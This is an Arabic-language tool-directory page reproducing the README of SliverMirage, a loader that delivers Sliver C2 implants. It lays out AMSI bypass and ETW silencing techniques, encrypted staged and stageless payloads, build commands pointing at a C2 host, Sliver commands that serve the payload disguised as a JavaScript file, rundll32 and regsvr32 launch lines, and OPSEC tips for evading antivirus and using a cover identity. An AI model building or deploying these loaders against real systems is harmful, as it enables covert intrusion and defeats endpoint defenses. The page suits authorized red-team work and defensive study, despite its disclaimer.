Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SliverMirage — Crystal Palace PICO loader for Sliver C2 | تجاوز AMSI ثنائي الطبقات، إسكات ETW، حمولات مشفرة بـ AES-256-CBC، 6 متغيرات تسليم | Kitploit
أدوات/GitHubGitHub/daniomass/slivermirage
الاستغلالما بعد الاستغلالتحليل البرمجيات الخبيثةالقيادة والسيطرةتحليل الملفات الثنائيةالفريق الأحمرتطوير الحمولات
GitHubdaniomass/slivermirage

SliverMirage

Crystal Palace PICO loader for Sliver C2 | تجاوز AMSI ثنائي الطبقات، إسكات ETW، حمولات مشفرة بـ AES-256-CBC، 6 متغيرات تسليم

عرض المستودع
154منذ 5 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SliverMirage

مشتق من CrystalSliver، يوسّع محمّل Crystal Palace PICO بإضافة تجاوز AMSI مزدوج الطبقات، وإسكات ETW، وستة أشكال تسليم لـ Sliver C2.

ما يفعله

يقوم SliverMirage بلفّ DLL الخاص بحقنة Sliver عبر محاكاة PICO من Crystal Palace، ثم يسلّمه عبر محمّل يتغلب على AMSI وETW دون تصحيح amsi.dll أو ntdll.dll.

حزمة التهرب:

الطبقةالتقنيةالتفاصيل
AMSI L1إفساد سلسلة CLRيعترض LdrRegisterDllNotification تحميل clr.dll، ويفسد AmsiScanBuffer في .rdata قبل أن يستدعي CLR الدالة GetProcAddress
AMSI L2VEH + HWBPمعالج الاستثناءات الموجه (VEH) على AmsiScanBuffer يُرجع E_INVALIDARG
ETWHWBPDR1 على NtTraceControl، يُرجع STATUS_SUCCESS
الحمولةAES-256-CBC + XORفك تشفير BCrypt، VirtualAlloc(RW) -> VirtualProtect(RX)، بدون أي RWX
المحاكاةCrystal Palace PICOيعمل DLL الخاص بـ Sliver داخل عملية PICO، غير مرئي لمضادات الفيروسات في وضع المستخدم

الأشكال

الصيغةالملفالتسليمC2 في وقت التشغيل؟
exeEXE مرحليEXE + payload.dat على موقع C2نعم (HTTPS)
exe-stagelessEXE غير مرحليEXE واحدلا
dllDLL غير مرحليDLL واحدلا
dll-stagedDLL مرحليDLL + payload.dat على موقع C2نعم (HTTPS)
shellcodeشيلكود مرحلي.bin + payload.datنعم (HTTPS)
shellcode-stagelessشيلكود غير مرحلي.bin واحدلا

الأشكال المرحلية تقوم بتنزيل PICO المشفّر وقت التشغيل من موقع HTTPS خاص بـ Sliver. يكون حجم EXE/DLL صغيرًا (~20 كيلوبايت) ولا يحمل أي حمولة على القرص.

الأشكال غير المرحلية تدمج PICO المشفّر وقت الترجمة (طبقة مزدوجة XOR + AES). حجمها أكبر على القرص لكن بدون أي نشاط شبكي قبل اتصال الـ beacon.

بدء سريع

المتطلبات الأساسية

  • x86_64-w64-mingw32-gcc (mingw-w64)
  • nasm
  • python3 مع pefile (pip install pefile)
  • openssl
  • Java 17 (لـ Crystal Palace — يتم تجهيزه تلقائيًا عبر build.sh)

البناء باستخدام build.sh (موصى به)

يقوم سكريبت البناء بتجهيز التبعيات المفقودة تلقائيًا (بما في ذلك Crystal Palace وJava 17) ويتعامل مع خط الإنتاج كاملًا: DLL -> Crystal Palace PICO -> تشفير -> ترجمة.

root@kitploit:~
# Staged EXE (default)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1

# Stageless EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless

# Stageless DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll

# Staged DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1

# Shellcode (staged)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1

# Shellcode (stageless)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless

الخيارات:

  • --dll <path> — DLL حقنة Sliver (مطلوب)
  • --host <ip> — عنوان IP لخادم C2 (مطلوب للصيغ المرحلية)
  • --port <port> — منفذ C2 (الافتراضي: 443)
  • --path <path> — مسار URL لتنزيل الحمولة (الافتراضي: /assets/js/vendor.js)
  • --format <fmt> — صيغة الإخراج (الافتراضي: exe)
  • --export <name> — اسم تصدير مخصص لـ DLL

البناء باستخدام Make (يدوي)

إذا كان لديك بالفعل blob من Crystal Palace PICO:

root@kitploit:~
# Staged EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1

# Stageless EXE
make exe-stageless PICO=/path/to/implant.crystal.bin

# Stageless DLL
make dll PICO=/path/to/implant.crystal.bin

# All targets
make clean

النشر

المرحلي (EXE أو DLL)

  1. ارفع build/payload.dat إلى موقع HTTPS خاص بـ Sliver:

    root@kitploit:~
    sliver > websites add-content --website cover \
      --web-path /assets/js/vendor.js \
      --content-type application/javascript \
      --content build/payload.dat
    
  2. سلّم build/csvchelper.exe (أو .dll) إلى الهدف.

غير المرحلي

تسليم بملف واحد. لا حاجة لإعداد موقع C2.

طرق تشغيل DLL

root@kitploit:~
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll

أو استخدم تحميل DLL الجانبي (sideloading) (أعد التسمية ليطابق DLL شرعيًا يحمّله التطبيق الهدف).

التصديرات: DllRegisterServer, DllUnregisterServer, StartW, VoidFunc

هيكل المشروع

root@kitploit:~
SliverMirage/
  loader/                    # Crystal Palace PICO loader (from CrystalSliver)
    src/                     # Loader C sources + draugr ASM
    loader.spec              # Crystal Palace linker spec
    pico.spec                # PICO generation spec
  src/
    stager_remote.c          # Staged EXE
    stager_stageless.c       # Stageless EXE
    stager_remote_dll.c      # Staged DLL
    stager_stageless_dll.c   # Stageless DLL
    stager_debug.c           # Debug EXE (MessageBox diagnostics)
  scripts/
    gen_payload.py           # AES-256-CBC encrypt (staged)
    gen_payload_stageless.py # AES + XOR embed (stageless)
    dll_to_shellcode.py      # sRDI DLL-to-shellcode converter
  resources/
    resource.rc              # Version info (EXE)
    resource_dll.rc          # Version info (DLL)
    manifest.xml             # asInvoker manifest
  libtcg.x64.zip             # TCG library for Crystal Palace
  Makefile
  build.sh

ملاحظات OPSEC

  • IAT نظيف: فقط kernel32, advapi32, bcrypt — جميعها واجهات برمجة Windows شرعية
  • لا تصحيحات للذاكرة: تجاوز AMSI/ETW يستخدم نقاط توقف الأجهزة، وليس VirtualProtect على DLLs النظام
  • لا يوجد RWX: ذاكرة الحمولة تنتقل من RW -> RX، ولا تكون RWX أبدًا
  • نظام GUI الفرعي: نقطة دخول WinMain, -mwindows — لا وميض لوحدة التحكم
  • معلومات الإصدار + المانيفست: مانيفست asInvoker المضمّن يكبت استدلالات UAC
  • التحكم في الإنتروبيا: الحمولات غير المرحلية تستخدم مفتاح XOR متغير لتقليل الإنتروبيا من ~7.8 إلى ~6.0-6.5
  • خصّص resource.rc / resource_dll.rc بهويتك التغطية قبل البناء

إخلاء مسؤولية

هذا المشروع مخصص لأغراض الاختبار الأمني المصرح به والبحث والتعليم فقط. استخدمه حصريًا في بيئات لديك فيها إذن كتابي صريح لإجراء اختبار الاختراق. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلفون أي مسؤولية عن إساءة استخدام هذا البرنامج.

الاعتمادات

  • Crystal Palace بواسطة Rasta Mouse — محرك محاكاة PICO
  • CrystalSliver — تكامل Crystal Palace + Sliver الأصلي
  • sRDI بواسطة Nick Landers — تقنية حقن DLL الانعكاسي عبر الشيلكود

الترخيص

MIT

تنزيل الأداة